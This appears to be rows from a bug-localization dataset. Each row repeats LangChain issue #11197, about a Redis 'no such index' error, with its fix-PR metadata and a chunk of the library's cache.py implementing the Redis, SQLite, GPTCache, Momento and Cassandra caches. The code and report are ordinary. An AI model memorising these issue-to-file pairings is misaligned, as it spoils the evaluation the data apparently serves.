def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
return self._cache.get((prompt, llm_string), None)
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
self._cache[(prompt, llm_string)] = return_val
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
self._cache = {}
Base = declarative_base()
class FullLLMCache(Base):
"""SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_llm_cache"
prompt = Column(String, primary_key=True)
llm = Column(String, primary_key=True)
idx = Column(Integer, primary_key=True)
response = Column(String)
class SQLAlchemyCache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt == prompt)
.where(self.cache_schema.llm == llm_string)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
rows = session.execute(stmt).fetchall()
if rows:
try:
return [loads(row[0]) for row in rows]
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
return [Generation(text=row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update based on prompt and llm_string."""
items = [
self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.query(self.cache_schema).delete()
session.commit()
class SQLiteCache(SQLAlchemyCache):
"""Cache that uses SQLite as a backend."""
def __init__(self, database_path: str = ".langchain.db"):
"""Initialize by creating the engine and all tables."""
engine = create_engine(f"sqlite:///{database_path}")
super().__init__(engine)
class UpstashRedisCache(BaseCache): |
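`SQLiteCache` is the zero-configuration entry point to the SQLAlchemy-backed cache above; a hedged usage sketch with the documented default path:
```python
import langchain
from langchain.cache import SQLiteCache

langchain.llm_cache = SQLiteCache(database_path=".langchain.db")
```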
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Upstash Redis as a backend."""
def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of UpstashRedisCache.
This method initializes an object with Upstash Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of an Upstash Redis
client class, allowing the object to interact with Upstash Redis
server for caching purposes.
Parameters:
redis_: An instance of Upstash Redis client class
(e.g., Redis) used for caching.
This allows the object to communicate with the
Redis server for caching operations.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from upstash_redis import Redis
except ImportError:
raise ValueError(
"Could not import upstash_redis python package. "
"Please install it with `pip install upstash_redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Upstash Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str: |
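A hedged configuration sketch for the Upstash-backed cache; the REST URL and token are placeholders you would copy from the Upstash console:
```python
import langchain
from langchain.cache import UpstashRedisCache
from upstash_redis import Redis

langchain.llm_cache = UpstashRedisCache(
    redis_=Redis(url="https://<your-db>.upstash.io", token="<rest-token>"),  # placeholders
    ttl=3600,
)
```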
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
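For orientation, the key computed above is just an MD5 digest of the concatenated prompt and LLM config string, and `update` stores one hash field per generation index. An illustrative (made-up) example:
```python
import hashlib

prompt, llm_string = "Tell me a joke", '{"model": "gpt2"}'
key = hashlib.md5((prompt + llm_string).encode()).hexdigest()
mapping = {"0": "first generation text", "1": "second generation text"}
# self.redis.hset(key=key, values=mapping) persists this, with an optional TTL.
```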
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"UpstashRedisCache supports caching of normal LLM generations, "
f"got {type(gen)}"
)
if isinstance(gen, ChatGeneration):
warnings.warn(
"NOTE: Generation has not been cached. UpstashRedisCache does not"
" support caching ChatModel outputs."
)
return
key = self._key(prompt, llm_string)
mapping = {
str(idx): generation.text for idx, generation in enumerate(return_val)
}
self.redis.hset(key=key, values=mapping)
if self.ttl is not None:
self.redis.expire(key, self.ttl)
def clear(self, **kwargs: Any) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
Clear cache. If `asynchronous` is True, flush asynchronously.
This flushes the *whole* db.
"""
asynchronous = kwargs.get("asynchronous", False)
if asynchronous:
asynchronous = "ASYNC"
else:
asynchronous = "SYNC"
self.redis.flushdb(flush_type=asynchronous)
class RedisCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Redis as a backend."""
def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of RedisCache.
This method initializes an object with Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of a Redis
client class, allowing the object to interact with a Redis
server for caching purposes.
Parameters:
redis_ (Any): An instance of a Redis client class
(e.g., redis.Redis) used for caching.
This allows the object to communicate with a
Redis server for caching operations.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from redis import Redis
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str: |
        """Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
try:
generations.append(loads(text))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
        """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self._key(prompt, llm_string)
with self.redis.pipeline() as pipe:
pipe.hset(
key,
mapping={
str(idx): dumps(generation)
for idx, generation in enumerate(return_val)
},
)
if self.ttl is not None:
pipe.expire(key, self.ttl)
pipe.execute()
def clear(self, **kwargs: Any) -> None:
"""Clear cache. If `asynchronous` is True, flush asynchronously."""
asynchronous = kwargs.get("asynchronous", False)
self.redis.flushdb(asynchronous=asynchronous, **kwargs)
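
# A minimal usage sketch for RedisCache (illustrative only; it assumes a Redis
# server reachable at the placeholder URL and the `redis` package installed):
#
#     from redis import Redis
#     from langchain.globals import set_llm_cache
#
#     client = Redis.from_url("redis://localhost:6379")
#     set_llm_cache(RedisCache(redis_=client, ttl=3600))
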
class RedisSemanticCache(BaseCache): |
    """Cache that uses Redis as a vector-store backend."""
DEFAULT_SCHEMA = {
"content_key": "prompt",
"text": [
{"name": "prompt"},
],
"extra": [{"name": "return_val"}, {"name": "llm_string"}],
}
def __init__( |
        self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2
):
"""Initialize by passing in the `init` GPTCache func
Args:
redis_url (str): URL to connect to Redis.
embedding (Embedding): Embedding provider for semantic encoding and search.
score_threshold (float, 0.2):
Example:
.. code-block:: python
from langchain.globals import set_llm_cache
from langchain.cache import RedisSemanticCache
from langchain.embeddings import OpenAIEmbeddings
set_llm_cache(RedisSemanticCache(
redis_url="redis://localhost:6379",
embedding=OpenAIEmbeddings()
))
"""
self._cache_dict: Dict[str, RedisVectorstore] = {}
self.redis_url = redis_url
self.embedding = embedding
self.score_threshold = score_threshold
def _index_name(self, llm_string: str) -> str: |
        hashed_index = _hash(llm_string)
return f"cache:{hashed_index}"
def _get_llm_cache(self, llm_string: str) -> RedisVectorstore:
index_name = self._index_name(llm_string)
if index_name in self._cache_dict:
return self._cache_dict[index_name]
try:
self._cache_dict[index_name] = RedisVectorstore.from_existing_index(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
schema=cast(Dict, self.DEFAULT_SCHEMA),
)
except ValueError:
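            # from_existing_index raises ValueError when the index is missing,
            # so build the vector store and create the index on first use.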
redis = RedisVectorstore(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
index_schema=cast(Dict, self.DEFAULT_SCHEMA),
)
_embedding = self.embedding.embed_query(text="test")
redis._create_index(dim=len(_embedding))
self._cache_dict[index_name] = redis
return self._cache_dict[index_name]
def clear(self, **kwargs: Any) -> None: |
        """Clear semantic cache for a given llm_string."""
index_name = self._index_name(kwargs["llm_string"])
if index_name in self._cache_dict:
self._cache_dict[index_name].drop_index(
index_name=index_name, delete_documents=True, redis_url=self.redis_url
)
del self._cache_dict[index_name]
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
        """Look up based on prompt and llm_string."""
llm_cache = self._get_llm_cache(llm_string)
generations: List = []
results = llm_cache.similarity_search(
query=prompt,
k=1,
distance_threshold=self.score_threshold,
)
if results:
for document in results:
try:
generations.extend(loads(document.metadata["return_val"]))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
generations.extend(
_load_generations_from_json(document.metadata["return_val"])
)
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
        """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisSemanticCache only supports caching of "
f"normal LLM generations, got {type(gen)}"
)
llm_cache = self._get_llm_cache(llm_string)
metadata = {
"llm_string": llm_string,
"prompt": prompt,
"return_val": dumps([g for g in return_val]),
}
llm_cache.add_texts(texts=[prompt], metadatas=[metadata])
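
# A sketch of the semantic lookup flow (illustrative only; `llm_string` would
# normally be the serialized parameters of a real model, and the embedding
# provider shown here is an assumption):
#
#     from langchain.embeddings import OpenAIEmbeddings
#
#     cache = RedisSemanticCache("redis://localhost:6379", OpenAIEmbeddings())
#     cache.update("What is 2 + 2?", llm_string, [Generation(text="4")])
#     # A semantically similar prompt can now return the cached generation:
#     cache.lookup("what is two plus two?", llm_string)
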
class GPTCache(BaseCache):
"""Cache that uses GPTCache as a backend."""
def __init__(
self,
init_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = None,
):
"""Initialize by passing in init function (default: `None`).
Args:
init_func (Optional[Callable[[Any], None]]): init `GPTCache` function
(default: `None`)
Example: |
        .. code-block:: python
# Initialize GPTCache with a custom init function
import gptcache
from gptcache.processor.pre import get_prompt
            from gptcache.manager.factory import manager_factory
from langchain.globals import set_llm_cache
            # Avoid multiple caches using the same file,
            # causing different llm model caches to affect each other
            def init_gptcache(cache_obj: gptcache.Cache, llm: str):
cache_obj.init(
pre_embedding_func=get_prompt,
data_manager=manager_factory(
manager="map",
data_dir=f"map_cache_{llm}"
),
)
set_llm_cache(GPTCache(init_gptcache))
"""
try:
import gptcache
except ImportError:
raise ImportError(
"Could not import gptcache python package. "
"Please install it with `pip install gptcache`."
)
self.init_gptcache_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = init_func
self.gptcache_dict: Dict[str, Any] = {}
def _new_gptcache(self, llm_string: str) -> Any: |
        """New gptcache object"""
from gptcache import Cache
from gptcache.manager.factory import get_data_manager
from gptcache.processor.pre import get_prompt
_gptcache = Cache()
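        # The user-supplied init callback may accept either (cache_obj,
        # llm_string) or just (cache_obj); dispatch on its signature arity.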
if self.init_gptcache_func is not None:
sig = inspect.signature(self.init_gptcache_func)
if len(sig.parameters) == 2:
self.init_gptcache_func(_gptcache, llm_string)
else:
self.init_gptcache_func(_gptcache)
else:
_gptcache.init(
pre_embedding_func=get_prompt,
data_manager=get_data_manager(data_path=llm_string),
)
self.gptcache_dict[llm_string] = _gptcache
return _gptcache
def _get_gptcache(self, llm_string: str) -> Any:
"""Get a cache object.
When the corresponding llm model cache does not exist, it will be created."""
_gptcache = self.gptcache_dict.get(llm_string, None)
if not _gptcache:
_gptcache = self._new_gptcache(llm_string)
return _gptcache
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
        """Look up the cache data.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then retrieve the data from the cache based on the `prompt`.
"""
from gptcache.adapter.api import get
_gptcache = self._get_gptcache(llm_string)
res = get(prompt, cache_obj=_gptcache)
if res:
return [
Generation(**generation_dict) for generation_dict in json.loads(res)
]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then store the `prompt` and `return_val` in the cache object.
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"GPTCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
from gptcache.adapter.api import put
_gptcache = self._get_gptcache(llm_string)
handled_data = json.dumps([generation.dict() for generation in return_val])
put(prompt, handled_data, cache_obj=_gptcache)
return None
def clear(self, **kwargs: Any) -> None: |
        """Clear cache."""
from gptcache import Cache
for gptcache_instance in self.gptcache_dict.values():
gptcache_instance = cast(Cache, gptcache_instance)
gptcache_instance.flush()
self.gptcache_dict.clear()
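
# A minimal sketch of the zero-configuration path (assumes the `gptcache`
# package is installed; with no init_func, each distinct llm_string gets its
# own data_path, as implemented in _new_gptcache above):
#
#     from langchain.globals import set_llm_cache
#
#     set_llm_cache(GPTCache())
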
def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None:
"""Create cache if it doesn't exist.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
from momento.responses import CreateCache
create_cache_response = cache_client.create_cache(cache_name)
if isinstance(create_cache_response, CreateCache.Success) or isinstance(
create_cache_response, CreateCache.CacheAlreadyExists
):
return None
elif isinstance(create_cache_response, CreateCache.Error):
raise create_cache_response.inner_exception
else:
raise Exception(f"Unexpected response cache creation: {create_cache_response}")
def _validate_ttl(ttl: Optional[timedelta]) -> None:
if ttl is not None and ttl <= timedelta(seconds=0):
raise ValueError(f"ttl must be positive but was {ttl}.")
class MomentoCache(BaseCache): |
    """Cache that uses Momento as a backend. See https://gomomento.com/"""
def __init__(
self,
cache_client: momento.CacheClient,
cache_name: str,
*,
ttl: Optional[timedelta] = None,
ensure_cache_exists: bool = True,
):
"""Instantiate a prompt cache using Momento as a backend.
Note: to instantiate the cache client passed to MomentoCache, |
        you must have a Momento account. See https://gomomento.com/.
Args:
cache_client (CacheClient): The Momento cache client.
cache_name (str): The name of the cache to use to store the data.
ttl (Optional[timedelta], optional): The time to live for the cache items.
Defaults to None, ie use the client default TTL.
ensure_cache_exists (bool, optional): Create the cache if it doesn't
exist. Defaults to True.
Raises:
ImportError: Momento python package is not installed.
TypeError: cache_client is not of type momento.CacheClientObject
ValueError: ttl is non-null and non-negative
"""
try:
from momento import CacheClient
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if not isinstance(cache_client, CacheClient):
raise TypeError("cache_client must be a momento.CacheClient object.")
_validate_ttl(ttl)
if ensure_cache_exists:
_ensure_cache_exists(cache_client, cache_name)
self.cache_client = cache_client
self.cache_name = cache_name
self.ttl = ttl
@classmethod
def from_client_params( |
        cls,
cache_name: str,
ttl: timedelta,
*,
configuration: Optional[momento.config.Configuration] = None,
api_key: Optional[str] = None,
auth_token: Optional[str] = None,
**kwargs: Any,
) -> MomentoCache:
"""Construct cache from CacheClient parameters."""
try:
from momento import CacheClient, Configurations, CredentialProvider
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if configuration is None:
configuration = Configurations.Laptop.v1()
try:
api_key = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN")
except ValueError:
api_key = api_key or get_from_env("api_key", "MOMENTO_API_KEY")
credentials = CredentialProvider.from_string(api_key)
cache_client = CacheClient(configuration, credentials, default_ttl=ttl)
return cls(cache_client, cache_name, ttl=ttl, **kwargs)
def __key(self, prompt: str, llm_string: str) -> str: |
        """Compute cache key from prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Returns:
str: The cache key.
"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
        """Lookup llm generations in cache by prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Raises:
SdkException: Momento service or network error
Returns:
Optional[RETURN_VAL_TYPE]: A list of language model generations.
"""
from momento.responses import CacheGet
generations: RETURN_VAL_TYPE = []
get_response = self.cache_client.get(
self.cache_name, self.__key(prompt, llm_string)
)
if isinstance(get_response, CacheGet.Hit):
value = get_response.value_string
generations = _load_generations_from_json(value)
elif isinstance(get_response, CacheGet.Miss):
pass
elif isinstance(get_response, CacheGet.Error):
raise get_response.inner_exception
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
        """Store llm generations in cache.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model string.
return_val (RETURN_VAL_TYPE): A list of language model generations.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"Momento only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self.__key(prompt, llm_string)
value = _dump_generations_to_json(return_val)
set_response = self.cache_client.set(self.cache_name, key, value, self.ttl)
from momento.responses import CacheSet
if isinstance(set_response, CacheSet.Success):
pass
elif isinstance(set_response, CacheSet.Error):
raise set_response.inner_exception
else:
raise Exception(f"Unexpected response: {set_response}")
def clear(self, **kwargs: Any) -> None: |
        """Clear the cache.
Raises:
SdkException: Momento service or network error
"""
from momento.responses import CacheFlush
flush_response = self.cache_client.flush_cache(self.cache_name)
if isinstance(flush_response, CacheFlush.Success):
pass
elif isinstance(flush_response, CacheFlush.Error):
raise flush_response.inner_exception
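
# A minimal usage sketch for MomentoCache (illustrative only; the cache name
# is a placeholder, and a Momento account with MOMENTO_API_KEY exported in the
# environment is assumed):
#
#     from datetime import timedelta
#     from langchain.globals import set_llm_cache
#
#     set_llm_cache(MomentoCache.from_client_params("langchain", ttl=timedelta(days=1)))
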
CASSANDRA_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_cache"
CASSANDRA_CACHE_DEFAULT_TTL_SECONDS = None
class CassandraCache(BaseCache):
"""
Cache that uses Cassandra / Astra DB as a backend.
It uses a single Cassandra table.
The lookup keys (which get to form the primary key) are:
- prompt, a string
- llm_string, a deterministic str representation of the model parameters.
(needed to prevent collisions same-prompt-different-model collisions)
"""
def __init__( |
        self,
session: Optional[CassandraSession] = None,
keyspace: Optional[str] = None,
table_name: str = CASSANDRA_CACHE_DEFAULT_TABLE_NAME,
ttl_seconds: Optional[int] = CASSANDRA_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize with a ready session and a keyspace name.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
table_name (str): name of the Cassandra table to use as cache
ttl_seconds (optional int): time-to-live for cache entries
(default: None, i.e. forever)
"""
try:
from cassio.table import ElasticCassandraTable
except (ImportError, ModuleNotFoundError):
raise ValueError(
"Could not import cassio python package. "
"Please install it with `pip install cassio`."
)
